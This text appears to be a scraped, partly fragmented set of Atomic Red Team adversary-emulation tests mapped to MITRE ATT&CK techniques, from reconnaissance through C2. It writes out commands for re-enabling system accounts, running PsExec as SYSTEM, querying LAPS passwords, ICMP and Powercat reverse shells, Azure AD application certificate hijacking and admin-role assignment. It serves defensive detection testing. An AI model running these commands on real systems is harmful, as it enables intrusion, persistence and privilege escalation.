Description: An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look like in `/etc/passwd` before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin`
cat /etc/passwd |grep nobody pw usermod nobody -s /bin/sh echo $(openssl passwd -1 art) | pw mod user nobody -h 0 su nobody whoami exit
Description: An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look like in `/etc/passwd` before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin`
Description: PsExec is a powerful tool most known for its remote management capability. However, it can also be used to run processes as the local system account.
The local system account is a default windows account which has unrestricted access to all system resources.
Upon successful execution, PsExec.exe will spawn a command prompt which will run 'whoami' as the local system account and then exit.
Prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
Description: Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
Automation runbook to execute malicious code and maintain persistence in their target's environment.
Prereq: Check if terraform is installed.
terraform version
Prereq: Check if Azure CLI and Azure Powershell are installed.
* Login to Azure CLI with "az login", and login to Azure Powershell with "Connect-AzAccount". Sessions are not shared. * Azure Powershell used in this test as they have better automation performance and error logging than Azure CLI.
Prereq: Create dependency resources using terraform
* If fail to meet prereq, navigate to T1078.004-2 using "cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/" * Open the "terraform.tfvars" file and fill in the variables with your desired values. * Re-run -GetPrereqs
Remove-AzAutomationRunbook -AutomationAccountName ART-AutomationAccountName-T1078-004 -Name ART-RunbookName-T1078-004 -ResourceGroupName ART-ResourceGroupName-T1078-004 -Force Remove-AzAutomationAccount -ResourceGroupName ART-ResourceGroupName-T1078-004 -Name ART-AutomationAccountName-T1078-004 -Force Remove-AzResourceGroup -Name ART-ResourceGroupName-T1078-004 -Force echo "Cleanup should be completed. Run 'terraform destroy` to ensure remaining resources are also deleted." cd "$T1078.004/src/T1078.004-2/" terraform destroy -auto-approve
T1078.004 - Valid Accounts: Cloud Accounts
GCP - Create Custom IAM Role
gcloud config set project atomic-test-1 gcloud iam roles create AtomicRedTeamRole --description="Atomic Red Team Custom IAM Role" --permissions=iam.serviceAccounts.get --project=atomic-test-1
Description: This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*. The idea for this Atomic came from a Rule published by the Elastic team.
Identifies an Identity and Access Management (IAM) custom role creation in Google Cloud Platform (GCP).
Custom roles are user-defined, and allow for the bundling of one or more supported permissions to meet specific needs.
Custom roles will not be updated automatically and could lead to privilege creep if not carefully scrutinized.
This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*
Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
Prereq: Requires gcloud
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Prereq: Check if user is logged in
gcloud config get-value account
Cleanup:
gcloud iam roles delete AtomicRedTeamRole --project=atomic-test-1
Description: Identify System Info. Upon execution, system info and time info will be displayed.
T1082 - System Information Discovery
System Information Discovery
system_profiler ls -al /Applications
Description: Identify System Info
T1082 - System Information Discovery
List OS Information
uname -a >> /tmp/T1082.txt if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi if [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi if [ -f /etc/os-release ]; then cat /etc/os-release >> /tmp/T1082.txt; fi uptime >> /tmp/T1082.txt cat /tmp/T1082.txt 2>/dev/null
Description: Identify System Info
Cleanup:
rm /tmp/T1082.txt 2>/dev/null
T1082 - System Information Discovery
Linux VM Check via Hardware
if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi if [ -f /sys/class/dmi/id/chassis_vendor ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi
Description: Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
Description: Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
T1082 - System Information Discovery
Griffon Recon
cscript "T1082\src\griffon_recon.vbs"
Description: This script emulates the reconnaissance script seen in used by Griffon and was modified by security researcher Kirk Sayre
in order simply print the recon results to the screen as opposed to exfiltrating them. [Script](https://gist.github.com/kirk-sayre-work/7cb5bf4e2c7c77fa5684ddc17053f1e5).
For more information see also [https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon](https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon) and [https://attack.mitre.org/software/S0417/](https://attack.mitre.org/software/S0417/)
Prereq: Sample script file must exist on disk at specified location (T1082\src\griffon_recon.vbs)
if (Test-Path "T1082\src\griffon_recon.vbs") {exit 0} else {exit 1}
T1082 - System Information Discovery
Environment variables discovery on windows
set
Description: Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
T1082 - System Information Discovery
Environment variables discovery on freebsd, macos and linux
env
Description: Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
T1082 - System Information Discovery
Show System Integrity Protection status (MacOS)
csrutil status
Description: Read and Display System Intergrety Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.
Description: PowerSharpPack - Seatbelt technique via function of WinPwn.
[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
Description: Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users.
Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users.
See https://github.com/cyberark/SkyArk
Prereq: The SkyArk AzureStealth module must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\AzureStealth.ps1"){exit 0} else {exit 1}
Description: Enumerate kernel modules installed 3 different ways. Upon successful execution stdout will display kernel modules installed on host 2 times, followed by list of modules matching 'vmw' if present.
T1082 - System Information Discovery
FreeBSD List Kernel Modules
kldstat kldstat | grep vmm
Description: Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
T1082 - System Information Discovery
System Information Discovery with WMIC
wmic cpu get name wmic MEMPHYSICAL get MaxCapacity wmic baseboard get product wmic baseboard get version wmic bios get SMBIOSBIOSVersion wmic path win32_VideoController get name wmic path win32_VideoController get DriverVersion wmic path win32_VideoController get VideoModeDescription wmic OS get Caption,OSArchitecture,Version wmic DISKDRIVE get Caption Get-WmiObject win32_bios
Description: Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions.
https://nwgat.ninja/getting-system-information-with-wmic-on-windows/
Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting:
https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar
https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
Description: The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
Description: Looks up country code configured in the registry, likely geofence. Upon execution, country code info will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
Description: Looks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
- https://evasions.checkpoint.com/techniques/registry.html
Description: An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine.
[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
Description: Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host.
[Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1082 - System Information Discovery
sysctl to gather macOS hardware info
sysctl -n hw.model
Description: Gets the macOS hardware information, which can be used to determine whether the target macOS host is running on a physical or virtual machine. sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.
Description: This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling
the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.
Cleanup:
cmd.exe /c del "%TMP%\a.txt"
T1082 - System Information Discovery
Enumerate Available Drives via gdr
powershell.exe -c "gdr -PSProvider 'FileSystem'"
Description: This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.
Description: Identify the Operating System Build Number via registry with the reg.exe command.
Upon execution, the OS Build Number will be displayed.
T1083 - File and Directory Discovery
File and Directory Discovery (cmd.exe)
dir /s c:\ >> %temp%\T1083Test1.txt dir /s "c:\Documents and Settings" >> %temp%\T1083Test1.txt dir /s "c:\Program Files\" >> %temp%\T1083Test1.txt dir "%systemdrive%\Users\*.*" >> %temp%\T1083Test1.txt dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\T1083Test1.txt dir "%userprofile%\Desktop\*.*" >> %temp%\T1083Test1.txt tree /F >> %temp%\T1083Test1.txt
Description: Find or discover files on the file system. Upon successful execution, this test will output the results of all the data discovery commands to a specified file.
Cleanup:
del %temp%\T1083Test1.txt
T1083 - File and Directory Discovery
File and Directory Discovery (PowerShell)
ls -recurse get-childitem -recurse gci -recurse
Description: Find or discover files on the file system. Upon execution, file and folder information will be displayed.
T1083 - File and Directory Discovery
Nix File and Directory Discovery
ls -a >> /tmp/T1083.txt if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > /tmp/T1083.txt; fi; file */* *>> /tmp/T1083.txt cat /tmp/T1083.txt 2>/dev/null find . -type f ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/' locate * which sh
Description: Find or discover files on the file system
References:
http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
https://perishablepress.com/list-files-folders-recursively-terminal/
Cleanup:
rm /tmp/T1083.txt
T1083 - File and Directory Discovery
Nix File and Directory Discovery 2
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/T1083.txt if [ -f /etc/mtab ]; then cat /etc/mtab >> /tmp/T1083.txt; fi; find . -type f -iname *.pdf >> /tmp/T1083.txt cat /tmp/T1083.txt find . -type f -name ".*"
Description: Find or discover files on the file system
Description: This test emulates MAZE ransomware's ability to enumerate directories using Powershell.
Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window.
See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
Description: Launches the DirLister executable for a short period of time and then exits.
Recently seen used by [BlackCat ransomware](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/) to create a list of accessible directories and files.
Prereq: DirLister.exe must exist in the specified path ..\ExternalPayloads\DirLister.exe
if (Test-Path "..\ExternalPayloads\DirLister.exe") {exit 0} else {exit 1}
Description: An adversary uses the find command to enumerate vmdks on an ESXi host.
[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1083 - File and Directory Discovery
Identifying Network Shares - Linux
findmnt -t nfs
Description: If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
Attackers may then attempt to access these shares for lateral movement or data exfiltration.
Description: Show if a user account has ever logged in remotely
Prereq: Check if lastlog command exists on the machine
if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi
Cleanup:
rm -f /tmp/T1087.001.txt
T1087.001 - Account Discovery: Local Account
Enumerate users and groups
groups id
Description: Utilize groups and id to enumerate users and groups
T1087.001 - Account Discovery: Local Account
Enumerate users and groups
dscl . list /Groups dscl . list /Users dscl . list /Users | grep -v '_' dscacheutil -q group dscacheutil -q user
Description: Utilize local utilities to enumerate users and groups
T1087.001 - Account Discovery: Local Account
Enumerate all accounts on Windows (Local)
net user dir c:\Users\ cmdkey.exe /list net localgroup "Users" net localgroup
Description: Enumerate all accounts
Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session
T1087.001 - Account Discovery: Local Account
Enumerate all accounts via PowerShell (Local)
net user get-localuser get-localgroupmember -group Users cmdkey.exe /list ls C:/Users get-childitem C:\Users\ dir C:\Users\ get-localgroup net localgroup
Description: Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
T1087.001 - Account Discovery: Local Account
Enumerate logged on users via CMD (Local)
query user
Description: Enumerate logged on users. Upon execution, logged on users will be displayed.
Description: An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"
Prereq: Check if we have plink
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1087.002 - Account Discovery: Domain Account
Enumerate all accounts (Domain)
net user /domain net group /domain
Description: Enumerate all accounts
Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
T1087.002 - Account Discovery: Domain Account
Enumerate all accounts via PowerShell (Domain)
net user /domain get-localgroupmember -group Users get-aduser -filter *
Description: Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
T1087.002 - Account Discovery: Domain Account
Enumerate logged on users via CMD (Domain)
query user /SERVER:%COMPUTERNAME%
Description: Enumerate logged on users. Upon exeuction, logged on users will be displayed.
Description: ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its
path will be displayed.
Prereq: ADRecon must exist on disk at specified location (..\ExternalPayloads\ADRecon.ps1)
if (Test-Path "..\ExternalPayloads\ADRecon.ps1") {exit 0} else {exit 1}
Description: Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1087.002 - Account Discovery: Domain Account
Adfind - Enumerate Active Directory Exchange AD Objects
Description: Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1087.002 - Account Discovery: Domain Account
Enumerate Default Domain Admin Details (Domain)
net user administrator /domain
Description: This test will enumerate the details of the built-in domain admin account
T1087.002 - Account Discovery: Domain Account
Enumerate Active Directory for Unconstrained Delegation
Description: Attackers may attempt to query for computer objects with the UserAccountControl property
'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
Prereq: PowerShell ActiveDirectory Module must be installed
Description: The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
T1087.002 - Account Discovery: Domain Account
Enumerate Linked Policies In ADSISearcher Discovery
Description: The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Description: The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Description: This test discovers users who have authenticated against a Domain Controller via NTLM.
This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
Cleanup:
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with Get-ADComputer all properties
Get-ADComputer $env:computername -Properties *
Description: This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
Description: This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
Description: This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with adfind all properties
Description: This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
T1087.002 - Account Discovery: Domain Account
Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
Description: This test uses LDAPDomainDump to perform account enumeration on a domain.
[Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
Prereq: Python3 must be installed
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
Prereq: Pip must be installed
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
Prereq: The ldapdomaindump module must be installed
Description: Enable traffic redirection on macOS UI (not terminal).
The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
Note that this test may conflict with pre-existing system configuration.
Cleanup:
networksetup -setwebproxystate Wi-Fi off networksetup -setsecurewebproxystate Wi-Fi off
Description: Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
Upon execution there will be a new proxy entry in netsh
netsh interface portproxy show all
Description: Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you
with uncensored access to Internet.
This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.
More information can be found about Psiphon using the following urls
http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
https://psiphon.ca/faq.html
Prereq: The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1}
Prereq: The Psiphon executable must exist in the Downloads folder
if (Test-Path "..\ExternalPayloads\psiphon3.exe") {exit 0} else {exit 1}
Prereq: Batch file containing commands to run must be in src directory
if (Test-Path "T1090.003\src\Psiphon.bat") {exit 0} else {exit 1}
Description: This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit.
Prereq: tor.exe must be installed on the machine
if (Test-Path "..\ExternalPayloads\tor\Tor\tor.exe") {exit 0} else {exit 1}
T1090.003 - Proxy: Multi-hop Proxy
Tor Proxy Usage - Debian/Ubuntu/FreeBSD
[ "$(uname)" = 'FreeBSD' ] && sysrc tor_enable="YES" && service tor start || sudo systemctl start tor
Description: This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.
Prereq: Tor must be installed on the machine
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
Cleanup:
[ "$(uname)" = 'FreeBSD' ] && service tor stop && sysrc -x tor_enable || sudo systemctl stop tor
T1090.003 - Proxy: Multi-hop Proxy
Tor Proxy Usage - MacOS
osascript -e 'tell application "Terminal" to do script "tor"'
Description: This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.
Prereq: Tor must be installed on the machine
if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
Cleanup:
killall tor > /dev/null 2>&1
T1091 - Replication Through Removable Media
USB Malware Spread Simulation
$RemovableDrives=@() $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID ForEach ($Drive in $RemovableDrives) { write-host "Removable Drive Found:" $Drive New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives." }
Description: Simulates an adversary copying malware to all connected removable drives.
Description: This will attempt to start C2 Session Using ICMP. For information on how to set up the listener
refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
Description: Start C2 Session Using Powercat
To start the listener on a Linux device, type the following:
nc -l -p
T1095 - Non-Application Layer Protocol
Linux ICMP Reverse Shell using icmp-cnc
{MISSING IN ATOMIC RED TEAM}
Description: ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems.
This method allows attackers to communicate and control compromised devices while remaining undetected.
For more details, check this blog: [ICMP Reverse Shell Blog](https://cryptsus.com/blog/icmp-reverse-shell.html)
**Important Notes:**
- Use `[icmp-cnc]` for the C2 server (Attacker) and `[icmpdoor]` for the C2 client (Victim).
- Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor].
- Root access is required.
$sp = Get-AzureADServicePrincipal -SearchString "SuperSP" | Select-Object -First 1 if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long $credNotAfter = (Get-Date).AddDays(1) $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking"
Description: Add a certificate to an Application through its Service Principal. The certificate can then be used to authenticate as the application.
This can be used for persistence, and also for privilege escalation by benefiting from the Application's rights.
An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
$app = Get-AzureADApplication -SearchString "SuperApp" | Select-Object -First 1 if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long $credNotAfter = (Get-Date).AddDays(1) $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking"
Description: Add a certificate to an Application through its App Registration. The certificate can then be used to authenticate as the application.
This can be used for persistence, and also for privilege escalation by benefiting from the Application's rights.
An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
Description: Give a nominated user, full mailbox delegation access of another user.
This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
Prereq: ExchangeOnlineManagement PowerShell module must be installed
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
#Saving the ObjectId of the target_user into a variable $target_objid = Get-AzureADUser -filter "userPrincipalName eq 'default'" | Select-Object -ExpandProperty ObjectId
#Reset the password of the target_user Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
Description: This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
Prereq: MSOnline and AzureAD modules must be installed.
if ($notInstalled) { # Prompt for installing the missing ones. Write-Output "The following PS modules aren't currently installed:" $notInstalled exit 1 }
else{ Write-Output "All required PS modules are installed" exit 0 }
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys; fi;
Description: Modify contents of /.ssh/authorized_keys to maintain persistence on victim host.
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
Description: Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins).
The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to
create the user and alter the group. Automatic installation of the dependency requires an elevated session,
and is unlikely to work with Powershell Core (untested).
If you consider running this test against a production Active Directory, the good practise is to create a dedicated
service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
as group manager of the target group.
Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
$user = Get-AzureADUser -Filter "DisplayName eq 'SuperUser' or UserPrincipalName eq 'SuperUser'" if ($user -eq $null) { Write-Warning "User not found"; exit } $role = Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Reader'" if ($role -eq $null) { Write-Warning "Role not found"; exit } Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
Description: The adversaries want to add user to some Azure AD role. Threat actor
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator,
Privileged Authentication Administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to the user principal in this test.
The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.
$sp = Get-AzureADServicePrincipal -Filter "DisplayName eq 'SuperSP'" if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } $role = Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Reader'" if ($role -eq $null) { Write-Warning "Role not found"; exit } Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
Description: The adversaries want to add service principal to some Azure AD role. Threat actor
may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator,
Privileged Authentication Administrator (this role can reset Global Administrator password!).
By default, the role Global Reader is assigned to service principal in this test.
The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.
